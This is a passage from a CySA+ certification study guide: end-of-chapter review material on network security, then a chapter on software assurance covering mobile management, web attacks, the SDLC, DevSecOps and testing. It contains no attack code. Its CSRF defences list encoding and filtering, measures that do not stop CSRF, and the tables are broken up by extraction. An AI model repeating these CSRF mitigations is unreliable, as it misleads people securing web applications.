of virtualization
2
0
1
Figure 8-16
Virtualization
2
0
2
Section
Type 1 vs. Type 2 hypervisors
2
0
3
Bulleted list
Virtualization attacks
2
0
3
Bulleted list
Attacks on management interfaces
2
0
5
Figure 8-19
Man-in-the-middle attack
2
0
6
Bulleted list
VDI models
2
0
7
Figure 8-22
Container-based virtualization
2
0
9
Bulleted list
Authentication factors
2
1
2
Bulleted list
Objectives of SSO
2
1
4
Bulleted lists
Advantages and disadvantages of SSO
2
1
5
Bulleted lists
Advantages and disadvantages of
Kerberos
2
1
6
Figure 8-23
Kerberos ticket-issuing process
2
1
7
Bulleted list
Federation models
2
1
9
Bulleted list
Security issues with federations
2
1
9
Bulleted list
SPML architecture components
2
2
0
Figure 8-25
SPML process
2
2
1
Bulleted lists
Advantages and disadvantages of
OpenID
2
2
2
Numbered list
SAML process
2
2
3
Paragraph
Description of role-based access control
(RBAC)
2
2
4
Bulleted list
MAC security modes
2
2
8
Bulleted list
Responsibilities of log management
infrastructure administrators
2
3
0
Table 8-3
Examples of logging configuration
settings
2
3
1
Numbered list
NIST SP 800-137 steps to establish,
implement, and maintain ISCM
2
3
2
Bulleted list
Security services provided by
cryptosystems
2
3
3
Table 8-4
Symmetric algorithm strengths and
weaknesses
2
3
4
Bulleted list
Advantages of stream-based ciphers
2
3
5
Bulleted list
Advantages of block ciphers
2
3
5
Table 8-5
Symmetric algorithms key facts
2
3
5
Table 8-6
Asymmetric algorithm strengths and
weaknesses
2
3
6
Numbered list
Process for hybrid encryption
2
3
7
Figure 8-30
Hash function process
2
3
9
Table 8-7
Applying cryptography
2
4
1
Bulleted list
Digital certificate classes
2
4
4
Numbered list
PKI steps
2
4
5
Figure 8-31
Active Cyber Defense Cycle
2
4
6
DEFINE KEY TERMS
Define the following key terms from this chapter and check your
answers in the glossary:
asset tagging
geotagging
geofencing
radio frequency identification (RFID)
segmentation
extranet
demilitarized zone (DMZ)
virtual local-area network (VLAN)
jumpbox
system isolation
air gap
bastion host
dual-homed firewall
multihomed firewall
screened host firewall
screened subnet
control plane
data plane
management plane
virtual storage area network (vSAN)
virtual private cloud (VPC)
virtual private network (VPN)
Point-to-Point Tunneling Protocol (PPTP)
Layer 2 Tunneling Protocol (L2TP)
Internet Protocol Security (IPsec)
Authentication Header (AH)
Encapsulating Security Payload (ESP)
Internet Security Association and Key Management Protocol
(ISAKMP)
Internet Key Exchange (IKE)
Secure Sockets Layer/Transport Layer Security (SSL/TLS)
change management
Type 1 hypervisor
Type 2 hypervisor
VM escape
virtual desktop infrastructure (VDI)
containerization
multifactor authentication (MFA)
knowledge factor authentication
ownership factor authentication
characteristic factor authentication
single sign-on (SSO)
Active Directory (AD)
Secure European System for Applications in a Multivendor
Environment (SESAME)
Service Provisioning Markup Language (SPML)
Security Assertion Markup Language (SAML)
OpenID
Shibboleth
role-based access control (RBAC)
attribute-based access control (ABAC)
mandatory access control (MAC)
cloud access security broker (CASB)
honeypot
symmetric algorithms
stream-based ciphers
block ciphers
asymmetric algorithms
Secure Shell (SSH)
public key infrastructure (PKI)
registration authority (RA)
certificate authority (CA)
Online Certificate Status Protocol (OCSP)
certificate revocation list (CRL)
active defense
hunt teaming
REVIEW QUESTIONS
1. _____________________ is the process of placing
physical identification numbers of some sort on all assets.
2. List at least two examples of segmentation.
3. Match the following terms with their definitions.
Terms
Definitions
Ju
mp
box
Device with no network connections and all access to the
system must be done manually by adding and removing
updates and patches with a flash drive or other external
device
Sys
te
m
isol
ati
on
Device exposed directly to the Internet or to any untrusted
network
Air
gap
Systems isolated from other systems through the control
of communications with the device
Bas
tio
n
hos
t
Firewall with two network interfaces: one pointing to the
internal network and another connected to an untrusted
network
Du
alho
me
d
fire
wal
l
A server that is used to access devices that have been
placed in a secure network zone such as a DMZ
4. In a(n) _____________________, two firewalls are
used, and traffic must be inspected at both firewalls before it
can enter the internal network.
5. List at least one of the network architecture planes.
6. Match the following terms with their definitions.
Ter
ms
Definitions
V
S
A
N
Allows external devices to access an internal network by
creating a tunnel over the Internet
V
P
C
Cloud model in which a public cloud provider isolates a
specific portion of its public cloud infrastructure to be
provisioned for private use
V
L
A
N
Logical segmentation on a switch at Layers 2 and 3
V
P
N
Software-defined storage method that allows pooling of
storage capabilities and instant and automatic provisioning
of virtual machine storage
7. ____________________________ handles the
creation of a security association for the session and the
exchange of keys in IPsec.
8. List at least two advantages of SSL/TLS.
9. Match the following terms with their definitions.
Terms
Definitions
Type 1
hypervis
or
Virtualization method that does not use a hypervisor
Containe
rization
Hypervisor installed over an operating system
VDI
Hypervisor installed on bare metal
Type 2
hypervis
or
Hosting desktop operating systems within a virtual
environment in a centralized server
10. ______________________ are authentication factors
that rely on something you have in your possession
Chapter 9
Software Assurance Best
Practices
This chapter covers the following topics related to Objective 2.2
(Explain software assurance best practices) of the CompTIA
Cybersecurity Analyst (CySA+) CS0-002 certification exam:
Platforms: Reviews software platforms, including mobile, web
application, client/server, embedded, System-on-Chip (SoC), and
firmware.
Software development life cycle (SDLC) integration:
Explains the formal process specified by the SDLC.
DevSecOps: Discusses the DevSecOps framework.
Software assessment methods: Covers user acceptance testing,
stress test application, security regression testing, and code review.
Secure coding best practices: Examines input validation,
output encoding, session management, authentication, data
protection, and parameterized queries.
Static analysis tools: Covers tools and methods for performing
static analysis.
Dynamic analysis tools: Discusses tools used to test the software
as it is running.
Formal methods for verification of critical software:
Discusses more structured methods of analysis.
Service-oriented architecture: Reviews Security Assertions
Markup Language (SAML), Simple Object Access Protocol (SOAP),
and Representational State Transfer (REST) and introduces
microservices.
Many organizations create software either for customers or for
their own internal use. When software is developed, the earlier
in the process security is considered, the less it will cost to
secure the software. It is best for software to be secure by
design. Secure coding standards are practices that, if followed
throughout the software development life cycle, help reduce the
attack surface of an application. Standards are developed
through a broad-based community effort for common
programming languages. This chapter looks at application
security, the type of testing to conduct, and secure coding best
practices from several well-known organizations that publish
guidance in this area.
“DO I KNOW THIS ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to assess
whether you should read the entire chapter. If you miss no more
than one of these nine self-assessment questions, you might
want to skip ahead to the “Exam Preparation Tasks” section.
Table 9-1 lists the major headings in this chapter and the “Do I
Know This Already?” quiz questions covering the material in
those headings so that you can assess your knowledge of these
specific areas. The answers to the “Do I Know This Already?”
quiz appear in Appendix A.
Table 9-1 “Do I Know This Already?” Foundation Topics
Section-to-Question Mapping
Foundation Topics Section
Questio
n
Platforms
1
Software Development Life Cycle (SDLC)
Integration
2
DevSecOps
3
Software Assessment Methods
4
Secure Coding Best Practices
5
Static Analysis Tools
6
Dynamic Analysis Tools
7
Formal Methods for Verification of Critical
Software
8
Service-Oriented Architecture
9
1. Which of the following is software designed to exert a
measure of control over mobile devices?
1. IoT
2. BYOD
3. MDM
4. COPE
2. Which of the following is the first step in the SDLC?
1. Design
2. Plan/initiate project
3. Release/maintain
4. Develop
3. Which of the following is not one of the three main actors in
traditional DevOps?
1. Operations
2. Security
3. QA
4. Production
4. Which of the following is done to verify functionality after
making a change to the software?
1. User acceptance testing
2. Regression testing
3. Fuzz testing
4. Code review
5. Which of the following is done to prevent the inclusion of
dangerous character types that might be inserted by
malicious individuals?
1. Input validation
2. Blacklisting
3. Output encoding
4. Fuzzing
6. Which form of code review looks at runtime information
while the software is in a static state?
1. Lexical analysis
2. Data flow analysis
3. Control flow graph
4. Taint analysis
7. Which of the following uses external agents to run scripted
transactions against an application?
1. RUM
2. Synthetic transaction monitoring
3. Fuzzing
4. SCCP
8. Which of the following levels of formal methods would be
the most appropriate in high-integrity systems involving
safety or security?
1. Level 0
2. Level 1
3. Level 2
4. Level 3
9. Which of the following is a client/server model for
interacting with content on remote systems, typically using
HTTP?
1. SOAP
2. SAML
3. OpenId
4. REST
FOUNDATION TOPICS
PLATFORMS
All software must run on an underlying platform that supplies
the software with the resources required to perform and
connections to the underlying hardware with which it must
interact. This section provides an overview of some common
platforms for which software is written.
Mobile
You learned a lot about the issues with mobile as a platform in
Chapter 5, “Threats and Vulnerabilities Associated with
Specialized Technology.” Let’s look at some additional issues
with this platform.
Containerization
One of the issues with allowing the use of personal devices in a
bring your own device (BYOD) initiative is the possible mixing
of sensitive corporate data with the personal data of the user.
Containerization is a newer feature of most mobile device
management (MDM) software that creates an encrypted
“container” to hold and quarantine corporate data separately
from that of the user’s data. This allows for MDM policies to be
applied only to that container and not the rest of the device.
Configuration Profiles and Payloads
MDM configuration profiles are used to control the use of
devices; when these profiles are applied to the devices, they
make changes to settings such as the passcode settings, Wi-Fi
passwords, virtual private network (VPN) configurations, and
more. Profiles also can restrict items that are available to the
user, such as the camera. The individual settings, called
payloads, may be organized into categories in some
implementations. For example, there may be a payload category
for basic settings, such as a required passcode, and other
payload categories, such as e-mail settings, Internet, and so on.
Personally Owned, Corporate Enabled
When a personally owned, corporate-enabled (POCE) policy is
in use, the organization’s users purchase their own devices but
allow the devices to be managed by corporate tools such as
MDM software.
Corporate-Owned, Personally Enabled
Corporate-owned, personally enabled (COPE) is a
strategy in which an organization purchases mobile devices and
users manage those devices. Organizations can often monitor
and control the users’ activity to a larger degree than with
personally owned devices. Besides using these devices for
business purposes, employees can use the devices for personal
activities, such as accessing social media sites, using e-mail, and
making calls. COPE also gives the company more power in
terms of policing and protecting devices. Organizations should
create explicit policies that define the allowed and disallowed
activities on COPE devices.
Application Wrapping
Another technique to protect mobile devices and the data they
contain is application wrapping. Application wrappers
(implemented as policies) enable administrators to set policies
that allow employees with mobile devices to safely download an
app, typically from an internal store. Policy elements can
include elements such as whether user authentication is
required for a specific app and whether data associated with the
app can be stored on the device.
Application, Content, and Data Management
In addition to the previously discussed containerization method
of securing data and applications, MDM solutions can use other
methods as well, such as conditional access, which defines
policies that control access to corporate data based on
conditions of the connection, including user, location, device
state, application sensitivity, and real-time risk. Moreover, these
policies can be granular enough to control certain actions within
an application, such as preventing cut and paste. Finally, more
secure control of sharing is possible, allowing for the control
and tracking of what happens after a file has been accessed,
with the ability to prevent copying, printing, and other actions
that help control sharing with unauthorized users.
Remote Wiping
Remote wipes are instructions sent remotely to a mobile
device that erase all the data, typically used when a device is lost
or stolen. In the case of the iPhone, this feature is closely
connected to the locater application Find My iPhone. Android
phones do not come with an official remote wipe. You can,
however, install an Android app called Lost Android that will do
this. Once the app is installed, it works in the same way as the
iPhone remote wipe. Android Device Manager provides almost
identical functionality to the iPhone. Remote wipe is a function
that comes with MDM software, and consent to remote wipe
should be required of any user who uses a mobile device in
either a BYOD or COPE environment.
SCEP
Simple Certificate Enrollment Protocol (SCEP)
provisions certificates to network devices, including mobile
devices. Because SCEP includes no provision for authenticating
the identity of the requester, two different authorization
mechanisms are used for the initial enrollment:
Manual: The requester is required to wait after submission for the
certificate authority (CA) operator or certificate officer to approve
the request.
Preshared secret: The SCEP server creates a “challenge
password” that must be somehow delivered out-of-band to the
requester and then included with the submission back to the server.
Security issues with SCEP include the fact that when the
preshared secret method is used, the challenge password is used
for authorization to submit a certificate request. It is not used
for authentication of the device.
NIST SP 800-163 Rev 1
NIST SP 800-163 Rev 1, Vetting the Security of Mobile
Applications, was written to help organizations do the
following:
Understand the process for vetting the security of mobile
applications
Plan for the implementation of an app vetting process
Develop app security requirements
Understand the types of app vulnerabilities and the testing methods
used to detect those vulnerabilities
Determine whether an app is acceptable for deployment on the
organization’s mobile devices
To provide software assurance for apps, organizations should
develop security requirements that specify, for example, how
data used by an app should be secured, the environment in
which an app will be deployed, and the acceptable level of risk
for an app. To help ensure that an app conforms to such
requirements, a process for evaluating the security of apps
should be performed.
The NIST SP 800-163 Rev 1 process is as follows:
1. Application vetting process: A sequence of activities performed
by an organization to determine whether a mobile app conforms to
the organization’s app security requirements. This process is shown
in Figure 9-1.
FIGURE 9-1 App Vetting Process
2. Application intake process: Begins when an app is received for
analysis. This process is typically performed manually by an
organization administrator or automatically by an app vetting
system. The app intake process has two primary inputs: the app
under consideration (required) and additional testing artifacts,
such as reports from previous app vetting results (optional).
3. Application testing process: Begins after an app has been
registered and preprocessed and is forwarded to one or more test
tools. A test tool is a software tool or service that tests an app for
the presence of software vulnerabilities.
4. Application approval/rejection process: Begins after a
vulnerability and risk report is generated by a test tool and made
available to one or more security analysts. A security analyst (or
analysts) inspects vulnerability reports and risk assessments from
one or more test tools to ensure that an app meets all general app
security requirements.
5. Results submission process: Begins after the final app
approval/rejection report is finalized by the authorizing official and
artifacts are prepared for submission to the requesting source.
6. App re-vetting process: From the perspective of a security
analyst, updates and threats they are designed to meet can force the
evaluation of updated apps to be treated as wholly new pieces of
software. Depending on the risk tolerance of an organization, this
can make the re-vetting of mobile apps critical for certain apps.
Web Application
Despite all efforts to design a secure web architecture, attacks
against web-based systems still occur and still succeed. This
section examines some of the more common types of attacks,
including maintenance hooks, time-of-check/time-of-use
attacks, and web-based attacks.
Maintenance Hooks
From the perspective of software development, a
maintenance hook is a set of instructions built into the code
that allows someone who knows about the so-called backdoor to
use the instructions to connect to view and edit the code without
using the normal access controls. In many cases maintenance
hooks are placed there to make it easier for the vendor to
provide support to the customer. In other cases they are placed
there to assist in testing and tracking the activities of the
product and are never removed later.
Note
The term maintenance account is often confused with maintenance hook. A
maintenance account is a backdoor account created by programmers to give
someone full permissions in a particular application or operating system. A
maintenance account can usually be deleted or disabled easily, but a true
maintenance hook is often a hidden part of the programming and much harder
to disable. Both of these can cause security issues because many attackers try
the documented maintenance hooks and maintenance accounts first. You would
be surprised at the number of computers attacked on a daily basis because
these two security issues are left unaddressed.
Regardless of how the maintenance hooks got into the code,
they can present a major security issue if they become known to
hackers who can use them to access the system.
Countermeasures on the part of the customer to mitigate the
danger are as follows:
Use a host-based IDS to record any attempt to access the system
using one of these hooks.
Encrypt all sensitive information contained in the system.
Implement auditing to supplement the IDS.
The best solution is for the vendor to remove all maintenance
hooks before the product goes into production. Code reviews
should be performed to identify and remove these hooks.
Time-of-Check/Time-of-Use Attacks
Time-of-check/time-of-use attacks attempt to take
advantage of the sequence of events that occurs as the system
completes common tasks. It relies on knowledge of the
dependencies present when a specific series of events occurs in
multiprocessing systems. By attempting to insert himself
between events and introduce changes, the hacker can gain
control of the result. A term often used as a synonym for a timeof-check/time-of-use attack is race condition, which is actually
a different attack. In this attack, the hacker inserts himself
between instructions, introduces changes, and alters the order
of execution of the instructions, thereby altering the outcome.
Countermeasures to these attacks are to make critical sets of
instructions atomic, which means that they either execute in
order and in entirety or the changes they make are rolled back
or prevented. It is also best for the system to lock access to
certain items it uses or touches when carrying out these sets of
instructions.
Cross-Site Request Forgery (CSRF)
Chapter 7, “Implementing Controls to Mitigate Attacks and
Software Vulnerabilities,” described cross-site scripting (XSS)
attacks. A similar attack is the cross-site request forgery
(CSRF), which causes an end user to execute unwanted actions
on a web application in which she is currently authenticated.
Unlike with XSS, in CSRF, the attacker exploits the website’s
trust of the browser rather than the other way around. The
website thinks that the request came from the user’s browser
and was actually made by the user. However, the request was
planted in the user’s browser. It usually gets there when a user
follows a URL that already contains the code to be injected. This
type of attack is shown in Figure 9-2.
Figure 9-2 CSRF
The following measures help prevent CSRF vulnerabilities in
web applications:
Using techniques such as URLEncode and HTMLEncode, encode
all output based on input parameters for special characters to
prevent malicious scripts from executing.
Filter input parameters based on special characters (those that
enable malicious scripts to execute).
Filter output based on input parameters for special characters.
Click-Jacking
A hacker using a click-jacking attack crafts a transparent
page or frame over a legitimate-looking page that entices the
user to click something. When the user does click, he is really
clicking on a different URL. In many cases, the site or
application may entice the user to enter credentials that could
be used later by the attacker. This type of attack is shown in
Figure 9-3.
Figure 9-3 Click-jacking
Client/Server
When a web application is developed, one of the decisions the
developers need to make is which information will be processed
on the server and which information will be processed on the
browser of the client. Figure 9-4 shows client-side processing,
and Figure 9-5 shows server-side processing. Many web
designers like processing to occur on the client side, which taxes
the web server less and enables it to serve more users. Others
shudder at the idea of sending to the client all the processing
code—and possibly information that could be useful in attacking
the server. Modern web development should be concerned with
finding the right balance between server-side and client-side
implementation. In some cases performance might outweigh
security or vice versa.
Figure 9-4 Client-Side Processing
Figure 9-5 Server-Side Processing
Embedded
An embedded system is a computer system with a dedicated
function within a larger system, often with real-time computing
constraints. It is embedded as part of the device, often including
hardware and mechanical parts. Embedded systems control
many devices in common use today and include systems
embedded in cars, HVAC systems, security alarms, and even
lighting systems. Machine-to-machine (M2M) communication,
the Internet of Things (IoT), and remotely controlled industrial
systems have increased the number of connected devices and
simultaneously made these devices targets.
Because embedded systems are usually placed within another
device without input from a security professional, security is not
even built into the device. So while allowing the device to
communicate over the Internet with a diagnostic system
provides a great service to the consumer, oftentimes the
manufacturer has not considered that a hacker can then reverse
communication and take over the device with the embedded
system. As of this writing, reports have surfaced of individuals
being able to take control of vehicles using their embedded
systems. Manufacturers have released patches that address such
issues, but not all vehicle owners have applied or even know
about the patches.
As M2M and IoT increase in popularity, security professionals
can expect to see a rise in incidents like this. A security
professional is expected to understand the vulnerabilities these
systems present and how to put controls in place to reduce an
organization’s risk.
Hardware/Embedded Device Analysis
Hardware/embedded device analysis involves using the tools
and firmware provided with devices to determine the actions
that were performed on and by the device. The techniques used
to analyze the hardware/embedded device vary based on the
device. In most cases, the device vendor can provide advice on
the best technique to use depending on what information you
need. Log analysis, operating system analysis, and memory
inspections are some of the general techniques used.
Hardware/embedded device analysis is used when mobile
devices are analyzed. For performing this type of analysis, NIST
makes the following recommendations:
Any analysis should not change the data contained on the device or
media.
Only competent investigators should access the original data and
must explain all actions they took.
Audit trails or other records must be created and preserved during
all steps of the investigation.
The lead investigator is responsible for ensuring that all these
procedures are followed.
All activities regarding digital evidence, including its seizure, access
to it, its storage, or its transfer, must be documented, preserved,
and available for review.
In Chapter 18, “Utilizing Basic Digital Forensics Techniques,”
you will learn more about forensics.
System-on-Chip (SoC)
A System-on-Chip (SoC) is an integrated circuit that
includes all components of a computer or another electronic
system. SoCs can be built around a microcontroller or a
microprocessor (the type found in mobile phones). Specialized
SoCs are also designed for specific applications. Secure SoCs
provide the key functionalities described in the following
sections.
Secure Booting
Secure booting is a series of authentication processes performed
on the hardware and software used in the boot chain. Secure
booting starts from a trusted entity (also called the anchor
point). The chip hardware booting sequence and BootROM are
the trusted entities, and they are fabricated in silicon. Hence, it
is next to impossible to change the hardware (trusted entity)
and still have a functional SoC. The process of authenticating
each successive stage is performed to create a chain of trust, as
depicted in Figure 9-6.
Figure 9-6 Secure Boot
Central Security Breach Response
The security breach response unit monitors security intrusions.
In the event that intrusions are reported by hardware detectors
(such as voltage, frequency, and temperature monitors), the
response unit moves the state of the SoC to nonsecure, which is
characterized by certain restrictions that differentiate it from
the secure state. Any further security breach reported to the
response unit takes the SoC to the fail state (that is, a
nonfunctional state). The SoC remains in the fail state until a
power-on-reset is issued. See Figure 9-7.
Figure 9-7 Central Security Breach Response
Firmware
Firmware is software that is stored on an erasable
programmable read-only memory (EPROM) or electrically
erasable PROM (EEPROM) chip within a device. While updates
to firmware may become necessary, they are infrequent.
Firmware can exist as the basic input/output system (BIOS) on
a computer or device.
Hardware devices, such as routers and printers, require some
processing power to complete their tasks. This software is also
contained in the firmware chips located within the devices. Like
with computers, this firmware is often installed on EEPROM to
allow it to be updated. Again, security professionals should
ensure that updates are only obtained from the device vendor
and that the updates have not been changed in any manner.
Firmware updates might be some of the more neglected but
important tasks that technicians perform. Many subscribe to
the principle “if it ain’t broke, don’t fix it.” The problem with
this approach is that in many cases firmware updates are not
designed to add functionality or fix something that doesn’t work
exactly right; rather, in many cases, they address security issues.
Computers contain a lot of firmware, all of which is potentially
vulnerable to hacking—everything from USB keyboards and
webcams to graphics and sound cards. Even computer batteries
have firmware. A simple Google search for “firmware
vulnerabilities” turns up pages and pages of results that detail
various vulnerabilities too numerous to mention. While it is not
important to understand each and every firmware vulnerability,
it is important to realize that firmware attacks are on the new
frontier, and the only way to protect yourself is to keep up with
the updates.
SOFTWARE DEVELOPMENT LIFE CYCLE
(SDLC) INTEGRATION
The goal of the software development life cycle (SDLC) is
to provide a predictable framework of procedures designed to
identify all requirements with regard to functionality, cost,
reliability, and delivery schedule and ensure that each is met in
the final solution. This section breaks down the steps in the
SDLC, listed next, and describes how each step contributes to
this ultimate goal. Keep in mind that steps in the SDLC can vary
based on the provider, and this is but one popular example.
Step 1. Plan/initiate project
Step 2. Gather requirements
Step 3. Design
Step 4. Develop
Step 5. Test/validate
Step 6. Release/maintain
Step 7. Certify/accredit
Step 8. Perform change management and configuration
management/replacement
Step 1: Plan/Initiate Project
In the plan/initiate step of the software development life cycle,
the organization decides to initiate a new software development
project and formally plans the project. Security professionals
should be involved in this phase to determine if information
involved in the project requires protection and if the application
needs to be safeguarded separately from the data it processes.
Security professionals need to analyze the expected results of
the new application to determine if the resultant data has a
higher value to the organization and, therefore, requires higher
protection.
Any information that is handled by the application needs a
value assigned by its owner, and any special regulatory or
compliance requirements need to be documented. For example,
healthcare information is regulated by several federal laws and
must be protected. The classification of all input and output
data of the application needs to be documented, and the
appropriate application controls should be documented to
ensure that the input and output data are protected.
Data transmission must also be analyzed to determine the types
of networks used. All data sources must be analyzed as well.
Finally, the effect of the application on organizational
operations and culture needs to be analyzed.
Step 2: Gather Requirements
In the gather requirements step of the software development
life cycle, both the functionality and the security requirements
of the solution are identified. These requirements could be
derived from a variety of sources, such as evaluating competitor
products for a commercial product or surveying the needs of
users for an internal solution. In some cases, these
requirements could come from a direct request from a current
customer.
From a security perspective, an organization must identify
potential vulnerabilities and threats. When this assessment is
performed, the intended purpose of the software and the
expected environment must be considered. Moreover, the
sensitivity of the data that will be generated or handled by the
solution must be assessed. Assigning a privacy impact rating to
the data to help guide measures intended to protect the data
from exposure might be useful.
Step 3: Design
In the design step of the software development life cycle, an
organization develops a detailed description of how the software
will satisfy all functional and security goals. It involves mapping
the internal behavior and operations of the software to specific
requirements to identify any requirements that have not been
met prior to implementation and testing.
During this process, the state of the application is determined in
every phase of its activities. The state of the application refers to
its functional and security posture during each operation it
performs. Therefore, all possible operations must be identified
to ensure that the software never enters an insecure state or acts
in an unpredictable way.
Identifying the attack surface is also a part of this analysis. The
attack surface describes what is available to be leveraged by an
attacker. The amount of attack surface might change at various
states of the application, but at no time should the attack
surface provided violate the security needs identified in the
gather requirements stage.
Step 4: Develop
The develop step is where the code or instructions that make the
software work is written. The emphasis of this phase is strict
adherence to secure coding practices. Some models that can
help promote secure coding are covered later in this chapter, in
the section “Application Security Frameworks.”
Many security issues with software are created through insecure
coding practices, such as lack of input validation or data type
checks. Security professionals must identify these issues in a
code review that attempts to assume all possible attack
scenarios and their impacts on the code. Not identifying these
issues can lead to attacks such as buffer overflows and injection
and to other error conditions.
Step 5: Test/Validate
In the test/validate step, several types of testing should occur,
including identifying both functional errors and security issues.
The auditing method that assesses the extent of the system
testing and identifies specific program logic that has not been
tested is called the test data method. This method tests not only
expected or valid input but also invalid and unexpected values
to assess the behavior of the software in both instances. An
active attempt should be made to attack the software, including
attempts at buffer overflows and denial-of-service (DoS)
attacks. Some types of testing performed at this time are
Verification testing: Determines whether the original design
specifications have been met
Validation testing: Takes a higher-level view and determines
whether the original purpose of the software has been achieved
Step 6: Release/Maintain
The release/maintenance step includes the implementation of
the software into the live environment and the continued
monitoring of its operation. At this point, as the software begins
to interface with other elements of the network, finding
additional functional and security problems is not unusual.
In many cases vulnerabilities are discovered in the live
environments for which no current fix or patch exists. This is
referred to as a zero-day vulnerability. Ideally, the supporting
development staff should discover such vulnerabilities before
those looking to exploit them do.
Step 7: Certify/Accredit
The certification step is the process of evaluating software for
its security effectiveness with regard to the customer’s needs.
Ratings can certainly be an input to this but are not the only
consideration. Accreditation is the formal acceptance of the
adequacy of a system’s overall security by management.
Provisional accreditation is given for a specific amount of time
and lists application, system, or accreditation documentation
required changes. Full accreditation grants accreditation
without any required changes. Provisional accreditation
becomes full accreditation once all the changes are completed,
analyzed, and approved by the certifying body.
Step 8: Change Management and Configuration
Management/Replacement
After a solution is deployed in the live environment, additional
changes will inevitably need to be made to the software due to
security issues. In some cases, the software might be altered to
enhance or increase its functionality. In any case, changes must
be handled through a formal change and configuration
management process.
The purpose of this step is to ensure that all changes to the
configuration of and to the source code itself are approved by
the proper personnel and are implemented in a safe and logical
manner. This process should always ensure continued
functionality in the live environment, and changes should be
documented fully, including all changes to hardware and
software.
In some cases, it may be necessary to completely replace
applications or systems. While some failures may be fixed with
enhancements or changes, a failure may occur that can be
solved only by completely replacing the application.
DEVSECOPS
DevSecOps is a development concept that grew out of the
DevOps approach to software development. Let’s first review
DevOps.
DevOps
Traditionally, three main actors in the software development
process—development (Dev), quality assurance (QA), and
operations (Ops)—performed their functions separately, or
operated in “silos.” Work would go from Dev to QA to Ops, in a
linear fashion, as shown in Figure 9-8.
This often led to delays, finger-pointing, and multiple iterations
through the linear cycle due to an overall lack of cooperation
between the units.
FIGURE 9-8 Traditional Development
DevOps aims at shorter development cycles, increased
deployment frequency, and more dependable releases, in close
alignment with business objectives. It encourages the three
units to work together through all phases of the development
process. Figure 9-9 shows a Venn diagram that represents this
idea.
Figure 9-9 DevOps
While DevOps was created to develop a better working
relationship between development, QA, and operations,
encouraging a sense of shared responsibility for successful
functionality, DevSecOps simply endeavors to bring the security
group into the tent as well and create a shared sense of
responsibility in all three groups with regard to security. As
depicted in Figure 9-10, the entire DevSecOps process is
wrapped in security, implying that security must be addressed
at every development step.
FIGURE 9-10 DevSecOps
SOFTWARE ASSESSMENT METHODS
During the testing phase of the SDLC, various different
assessment methods can be used. Among them are user
acceptance testing, stress testing applications, security
regression testing, and code review. The following sections dig
into how these assessment methods operate.
User Acceptance Testing
While it is important to make web applications secure, in some
cases security features make an application unusable from the
user perspective. User acceptance testing (UAT) is
designed to ensure that this does not occur. Keep the following
guidelines in mind when designing user acceptance testing:
Perform the testing in an environment that mirrors the live
environment.
Identify real-world use cases for execution.
Select UAT staff from various internal departments.
Stress Test Application
While the goal of many types of testing is locating security
issues, the goal of stress testing is to determine the workload
that the application can withstand. These tests should be
performed in a certain way and should always have defined
objectives before testing begins. You will find many models for
stress testing, but one suggested order of activities is as follows:
Step 1. Identify test objectives in terms of the desired
outcomes of the testing activity.
Step 2. Identify key scenario(s)—the cases that need to be
stress tested (for example, test login, test searching,
test checkout).
Step 3. Identify the workload that you want to apply (for
example, simulate 300 users).
Step 4. Identify the metrics you want to collect and what
form these metrics will take (for example, time to
complete login, time to complete search).
Step 5. Create test cases. Define steps for running a single
test, as well as your expected results (for example, Step
1: Select a product; Step 2: Add to cart; Step 3: Check
out).
Step 6. Simulate load by using test tools (for example,
attempt 300 sessions).
Step 7. Analyze results.
Security Regression Testing
Regression testing is done to verify functionality after making a
change to the software. Security regression testing is a
subset of regression testing that validates that changes have not
reduced the security of the application or opened new
weaknesses. This testing should be performed by a different
group than the group that implemented the change. It can occur
in any part of the development process and includes the
following types:
Unit regression: This type tests the code as a single unit.
Interactions and dependencies are not tested.
Partial regression: With this type, new code is made to interact
with other parts of older existing code.
Complete regression: This type is the final step in regression
testing and performs testing on all units.
Code Review
Code review is the systematic investigation of the code for
security and functional problems. It can take many forms, from
simple peer review to formal code review. There are two main
types of code review:
Formal review: This is an extremely thorough, line-by-line
inspection, usually performed by multiple participants using
multiple phases. This is the most time-consuming type of code
review but the most effective at finding defects.
Lightweight review: This type of code review is much more
cursory than a formal review. It is usually done as a normal part of
the development process. It can happen in several forms:
Pair programming: Two coders work side by side, checking
one another’s work as they go.
E-mail review: Code is e-mailed around to colleagues for them
to review when time permits.
Over the shoulder: Coworkers review the code while the
author explains his or her reasoning.
Tool-assisted: Using automated testing tools is perhaps the
most efficient method.
Security Testing
Black-box testing, or zero-knowledge testing: The team is
provided with no knowledge regarding the organization’s
application. The team can use any means at its disposal to obtain
information about the organization’s application. This is also
referred to as closed testing.
White-box testing: The team goes into the process with a deep
understanding of the application or system. Using this knowledge,
the team builds test cases to exercise each path, input field, and
processing routine.
Gray-box testing: The team is provided more information than in
black-box testing, while not as much as in white-box testing. Graybox testing has the advantage of being nonintrusive while
maintaining the boundary between developer and tester. On the
other hand, it may uncover some of the problems that might be
discovered with white-box testing.
Table 9-2 compares black-box, gray-box, and white-box testing.
Table 9-2 Comparing Black-Box, Gray-Box, and White-Box
Testing
Black Box
Internal
workings of the
Gray Box
Internal workings of
the application are
White Box
Internal
workings of the
application are
not known.
somewhat known.
application are
fully known.
Also called
closed-box,
data-driven, or
functional
testing.
Also called translucent
testing, as the tester has
partial knowledge.
Also known as
clear-box,
structural, or
code-based
testing.
Performed by
end users,
testers, and
developers.
Performed by end
users, testers, and
developers.
Performed by
testers and
developers.
Least timeconsuming.
More time-consuming
than black-box testing
but less so than whitebox testing.
Most exhaustive
and timeconsuming.
While code review is most typically performed on in-house
applications, it may be warranted in other scenarios as well. For
example, say that you are contracting with a third party to
develop a web application to process credit cards. Considering
the sensitive nature of the application, it would not be unusual
for you to request your own code review to assess the security of
the product.
In many cases, more than one tool should be used in testing an
application. For example, an online banking application that
has had its source code updated should undergo both
penetration testing with accounts of varying privilege levels and
a code review of the critical models to ensure that defects do not
exist.
Code Review Process
Code review varies from organization to organization. Fagan
inspections are the most formal code reviews that can occur and
should adhere to the following process:
1. Plan
2. Overview
3. Prepare
4. Inspect
5. Rework
6. Follow-up
Most organizations do not strictly adhere to the Fagan
inspection process. Each organization should adopt a code
review process fitting for its business requirements. The more
restrictive the environment, the more formal the code review
process should be.
SECURE CODING BEST PRACTICES
Earlier this chapter covered software development security best
practices. In addition to those best practices, developers should
follow the secure coding best practices covered in the following
sections.
Input Validation
Many attacks arise because a web application has not validated
the data entered by the user (or hacker). Input validation is
the process of checking all input for issues such as proper
format and proper length. In many cases, these validators use
either the blacklisting of characters or patterns or the
whitelisting of characters or patterns. Blacklisting looks for
characters or patterns to block. It can be prone to preventing
